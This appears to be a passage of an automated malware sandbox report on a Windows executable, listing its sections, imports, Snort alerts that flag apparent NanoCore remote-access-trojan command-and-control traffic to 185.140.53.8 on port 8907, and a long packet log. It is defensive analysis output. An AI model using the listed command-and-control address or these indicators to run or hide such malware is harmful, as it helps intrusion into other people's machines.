.text	0x1000	0x17f49	0x18000	False	0.516937255859	data	6.60931791398	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x6002	0x6200	False	0.370894451531	data	4.53614585813	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x20000	0x31c4	0x1400	False	0.320703125	data	3.52089438859	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x345e8	0x34600	False	0.966983330847	data	7.99013268015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x59000	0x13c8	0x1400	False	0.81640625	data	6.61096020071	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
OZX	0x240b0	0x343b6	data	English	United States
RT_MANIFEST	0x58468	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
IMM32.dll	ImmInstallIMEA, ImmDisableIME, ImmGetRegisterWordStyleW, ImmIsUIMessageA
KERNEL32.dll	LoadLibraryExW, lstrcmpiW, lstrcpyW, lstrcatW, lstrlenW, CloseHandle, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, FreeLibrary, GetTimeFormatW, VirtualProtect, GetDateFormatW, GetProcessHeap, HeapSize, GetStringTypeW, HeapReAlloc, OutputDebugStringW, RtlUnwind, SetConsoleCtrlHandler, IsProcessorFeaturePresent, IsDebuggerPresent, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FatalAppExitA, LeaveCriticalSection, EnterCriticalSection, CreateSemaphoreW, GetModuleHandleW, GetTickCount, TlsFree, HeapFree, HeapAlloc, GetLastError, ExpandEnvironmentStringsW, GetProcAddress, CompareStringW, GetCommandLineW, SetLastError, GetCurrentThread, GetCurrentThreadId, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameW, WriteFile, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, CreateFileW
RESUTILS.dll	ResUtilStopService, ResUtilGetPrivateProperties, ResUtilDupParameterBlock, ResUtilResourcesEqual, ResUtilGetProperty
loadperf.dll	UnloadPerfCounterTextStringsW, LoadPerfCounterTextStringsA
MSVFW32.dll	ICGetDisplayFormat, DrawDibChangePalette, DrawDibClose
AVIFIL32.dll	AVIFileEndRecord
WSOCK32.dll	ord1107, inet_ntoa, getservbyport, htons, getservbyname, WSASetBlockingHook
SETUPAPI.dll	SetupInstallFileExA, SetupTerminateFileLog, SetupLogFileW, SetupOpenMasterInf, SetupInstallFileExW, SetupGetLineCountW, SetupDiGetHwProfileFriendlyNameExW
USER32.dll	GrayStringA, MessageBoxW, GetDC
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegQueryValueExA, StartServiceCtrlDispatcherW, RegQueryValueExW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/15/21-06:13:25.405871	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49735	8907	192.168.2.3	185.140.53.8
09/15/21-06:13:31.501018	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49736	8907	192.168.2.3	185.140.53.8
09/15/21-06:13:38.187895	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49737	8907	192.168.2.3	185.140.53.8
09/15/21-06:13:44.206046	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49742	8907	192.168.2.3	185.140.53.8
09/15/21-06:13:50.209237	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49745	8907	192.168.2.3	185.140.53.8
09/15/21-06:13:56.944143	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49746	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:01.984974	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49747	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:06.785682	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49754	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:12.820795	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49774	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:18.902806	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49775	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:23.515493	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49779	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:29.704539	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49786	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:35.710881	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49787	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:41.780948	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49788	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:48.141045	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49789	8907	192.168.2.3	185.140.53.8
09/15/21-06:14:54.128708	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49790	8907	192.168.2.3	185.140.53.8
09/15/21-06:15:00.100074	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49795	8907	192.168.2.3	185.140.53.8
09/15/21-06:15:06.102195	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49796	8907	192.168.2.3	185.140.53.8
09/15/21-06:15:12.099261	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49797	8907	192.168.2.3	185.140.53.8
09/15/21-06:15:18.180591	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49798	8907	192.168.2.3	185.140.53.8
09/15/21-06:15:24.133637	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49799	8907	192.168.2.3	185.140.53.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 06:13:16.873142004 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.873223066 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.873270988 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.873308897 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.873359919 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.873398066 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.873409986 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.873435020 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.873457909 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.873471022 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.890158892 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890197992 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890346050 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890383005 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890409946 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890435934 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890460014 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890621901 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890652895 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890678883 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890703917 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890728951 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890753031 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890808105 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.890837908 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891010046 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891036987 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891081095 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891105890 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891177893 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891210079 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891233921 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891258955 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891283989 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891366005 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891402006 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891441107 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891475916 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891511917 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891540051 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891583920 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891608000 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891633034 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891711950 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891758919 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891803026 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891828060 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891854048 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891877890 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891915083 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891948938 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891973972 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.891999960 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892015934 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.892182112 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892219067 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892251968 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892286062 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892322063 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892364979 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892402887 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892441034 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892477989 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892515898 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892553091 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892590046 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892627001 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892633915 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:16.892668009 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892698050 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892721891 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892748117 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892772913 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892937899 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.892976999 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.893004894 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.893028021 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.893054008 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.893079042 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.893120050 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.893160105 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.893196106 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.893234015 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:16.893261909 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:17.122844934 CEST	443	49686	204.79.197.200	192.168.2.3
Sep 15, 2021 06:13:17.122977018 CEST	49686	443	192.168.2.3	204.79.197.200
Sep 15, 2021 06:13:25.199580908 CEST	49735	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:25.375214100 CEST	8907	49735	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:25.375374079 CEST	49735	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:25.405870914 CEST	49735	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:25.707206011 CEST	8907	49735	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:25.707415104 CEST	49735	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:26.107563019 CEST	8907	49735	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:26.107681036 CEST	49735	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:26.628405094 CEST	49735	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:26.819199085 CEST	8907	49735	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:27.254935980 CEST	49735	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:27.432110071 CEST	8907	49735	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:27.432234049 CEST	49735	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:31.297956944 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:31.499280930 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:31.499592066 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:31.501018047 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:31.827132940 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:31.827296972 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:32.207072020 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:32.207170010 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:32.384747028 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:32.384870052 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:32.767215014 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:32.767311096 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.063822031 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.063935041 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.064723969 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.064789057 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.255503893 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.255537033 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.255609989 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.257477999 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.265494108 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.265528917 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.265564919 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.265595913 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.443430901 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.443528891 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.443603992 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.443672895 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.444164991 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.444252014 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.445105076 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.445167065 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.445188046 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.445233107 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.446216106 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.446297884 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.448215008 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.448259115 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.448306084 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.448335886 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.638273001 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.642786980 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.642963886 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.644093037 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.644164085 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.644284010 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.645066023 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.646286011 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.646327972 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.646424055 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.647634029 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.647766113 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.648758888 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.648819923 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.648880005 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.649136066 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.649175882 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.649228096 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.650233984 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.651196003 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.651256084 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.651305914 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.652254105 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.652314901 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.771013021 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.827425957 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.827516079 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.835213900 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.835274935 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.837320089 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.837389946 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.837397099 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.837438107 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.837459087 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.837507963 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.839958906 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.839998007 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.840033054 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.840060949 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.840070963 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.840112925 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.840118885 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.840151072 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.840163946 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.840202093 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.841048956 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.841093063 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.841106892 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.841145992 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.842093945 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.842144012 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.843178034 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.843211889 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.843233109 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.843266010 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.844162941 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.844216108 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.845115900 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.845155001 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.845195055 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.845227003 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.846100092 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.846163988 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.846183062 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.846215963 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.847793102 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.847851038 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.848217964 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.848259926 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.848297119 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.848361969 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.849308968 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.849374056 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.850193024 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.850234985 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.850275040 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.850308895 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.851191044 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.851228952 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.851262093 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.851298094 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.852757931 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.852821112 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.853235960 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.853276014 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.853293896 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.853344917 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.854187012 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:33.854257107 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:33.994858027 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.015425920 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.015515089 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.015623093 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.024367094 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.024434090 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.024436951 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.024509907 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.025223017 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.025296926 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.025333881 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.025382996 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.026228905 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.026278973 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.026397943 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.026443958 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.027183056 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.027245045 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.028220892 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.028264046 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.028285980 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.028311014 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.029172897 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.029243946 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.034296989 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.034339905 CEST	8907	49736	185.140.53.8	192.168.2.3
Sep 15, 2021 06:13:34.034358025 CEST	49736	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:13:34.034401894 CEST	49736	8907	192.168.2.3	185.140.53.8
